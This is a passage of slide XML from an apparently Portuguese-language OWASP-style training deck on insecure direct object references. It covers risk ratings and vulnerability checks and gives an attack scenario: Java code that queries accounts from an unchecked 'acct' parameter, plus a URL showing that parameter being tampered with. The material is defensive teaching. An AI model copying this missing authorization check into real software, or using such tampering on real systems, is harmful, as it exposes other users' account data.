                  <a:tcPr marL="45720" marR="45720" marT="45719" marB="45719">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hMerge="1">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="en-US"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="en-US" sz="1000" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="45720" marR="45720" marT="45719" marB="45719">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a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="en-US" sz="1000" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="45720" marR="45720" marT="45719" marB="45719">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r>
              <a:tr h="5486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000" b="1" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Específico da </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="1000" b="1" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Aplicaçã</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="1000" b="1" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>o</a:t>
                      </a:r>
                      <a:endParaRPr lang="pt-BR" sz="1000" b="1" noProof="0" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="45720" marR="45720" marT="45719" marB="45719"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pt-BR" sz="1000" b="1" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Exploração</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="1000" b="1" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>FÁCIL</a:t>
                      </a:r>
                      <a:endParaRPr lang="pt-BR" sz="1000" b="1" noProof="0" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="45720" marR="45720" marT="45719" marB="45719"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marL="0" algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1"/>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="1000" b="1" kern="1200" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Prevalência</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="1000" b="1" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>COMUM</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="45720" marR="45720" marT="45719" marB="45719"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pt-BR" sz="1000" b="1" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Detecção</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="1000" b="1" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>FÁCIL</a:t>
                      </a:r>
                      <a:endParaRPr lang="pt-BR" sz="1000" b="1" noProof="0" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="45720" marR="45720" marT="45719" marB="45719"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pt-BR" sz="1000" b="1" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Impacto</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="1000" b="1" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>MODERADO</a:t>
                      </a:r>
                      <a:endParaRPr lang="pt-BR" sz="1000" b="1" noProof="0" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="45720" marR="45720" marT="45719" marB="45719"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baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Específico do Negócio/</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Aplicação</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="45720" marR="45720" marT="45719" marB="45719"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15397">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="900" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Considere o tipo dos usuários do seu sistema. Qualquer usuário tem somente acesso parcial a determinados tipos de dados do sistema?</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="900" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx2"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="45720" marR="45720" marT="45719" marB="45719">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000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="900" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>O atacante, que é um usuário autorizado do sistema,</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="900" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="900" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>simplesmente muda o valor de um parâmetro que se refere diretamente a um objeto do sistema por outro objeto que o usuário não está autorizado. O acesso é concedido?</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="900" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx2"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="45720" marR="45720" marT="45719" marB="45719">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nSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="900" b="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Aplicações freqüentemente usam o nome real ou a chave de um objeto ao gerar páginas web. Aplicações nem sempre verificam se o usuário é autorizado para o objeto alvo. Isto resulta numa falha de referência insegura e direta a um objeto. Testadores podem facilmente manipular valores de parâmetros para detectar tal falha. Análise de código rapidamente mostra se a autorização é</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="900" b="0" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="900" b="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>verificada de forma adequada.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="900" b="0" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx2"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="45720" marR="45720" marT="45719" marB="45719">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a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="900" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Tais falhas podem comprometer todos os dados que podem ser referenciados pelo parâmetro. A menos que as referências a objetos sejam imprevisíveis, é fácil para um atacante acessar todos os dados disponíveis desse tipo.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="900" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx2"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="45720" marR="45720" marT="45719" marB="45719">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000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="900" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Considere o valor de negócio dos dados expostos. </a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="900" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Também considere o impacto ao negócio da exposição pública da</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="900" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="900" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>vulnerabilidade.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="900" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="tx2"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="45720" marR="45720" marT="45719" marB="45719">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07" name="Rectangle 106"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="6588224"/>
            <a:ext cx="3382963" cy="2555776"/>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lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="pt-BR" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Exemplo de Cenário de Ataque</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="auto">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-BR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>A aplicação utiliza dados não verificados em uma chamada SQL que está acessando as informações de conta:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="auto">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  String query = "SELECT * FROM accts WHERE account = ?";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="auto">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  PreparedStatement pstmt =</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  connection.prepareStatement(query , … );</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="auto">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  pstmt.setString( 1, request.getParameter("acct"));</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="auto">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  ResultSet results = pstmt.executeQuery( );</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="auto">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-BR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>O atacante simplesmente modifica o parâmetro ‘acct’ em seu navegador para enviar qualquer número de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>conta. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Se não verificado adequadamente, o atacante pode acessar qualquer conta de usuário, em vez de somente a conta do cliente pretendido.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="auto">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://example.com/app/accountInfo?acct=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>notmyacct</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="108" name="Rectangle 107"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="15159" y="3779912"/>
            <a:ext cx="3382963" cy="2736304"/>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lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="pt-BR" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Estou </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>vulnerável?</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR" sz="300" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="auto">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-BR" sz="950" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>A melhor forma de saber se uma aplicação é vulnerável a referência </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="950" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>insegura e direta </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="950" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="950" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>objeto </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="950" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>é verificar se </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="950" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>todos</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="950" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> os objetos referenciados possuem defesas apropriadas. Para atingir esse objetivo, considere:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="950" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-BR" sz="950" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Para referências </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="950" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>diretas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="950" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> a recursos </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="950" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>restritos</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="950" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, a aplicação falha em verificar se o usuário </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="950" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>está autorizado a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="950" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>acessar o exato recurso que ele </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="950" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>requisitou?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="950" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-BR" sz="950" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Se a referência é uma referência </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="950" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>indireta</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="950" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, o mapeamento para a referência direta falha ao limitar os valores para aqueles autorizados para o usuário atual?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="950" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-BR" sz="950" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Revisão de código da aplicação pode rapidamente verificar se </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="950" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>qualquer abordagem é implementada com segurança. Teste </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="950" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>também é efetivo para </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="950" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>identificar referências diretas a objetos e </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="950" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>se </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="950" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>elas </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="950" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>são </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="950" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>seguras</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="950" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>. Ferramentas automatizadas normalmente não procuram por essa falha, porque </a:t>
            </a:r>
            <a:r>
